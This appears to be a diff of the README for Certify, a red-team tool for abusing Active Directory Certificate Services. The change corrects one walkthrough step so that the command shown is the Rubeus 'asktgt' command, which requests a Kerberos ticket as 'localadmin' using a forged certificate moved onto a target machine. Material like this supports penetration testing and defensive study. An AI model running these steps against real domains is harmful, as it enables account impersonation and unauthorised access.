GhostPack/Certify/README.md

     (base) laptop:~ harmj0y$

-Finally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the `altname` user using Certify:
+Finally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the `altname` user using Rubeus:

-    C:\Temp>Certify.exe asktgt /user:localadmin /certificate:C:\Temp\cert.pfx
+    C:\Temp>Rubeus.exe asktgt /user:localadmin /certificate:C:\Temp\cert.pfx

        ______        _
       (_____ \      | |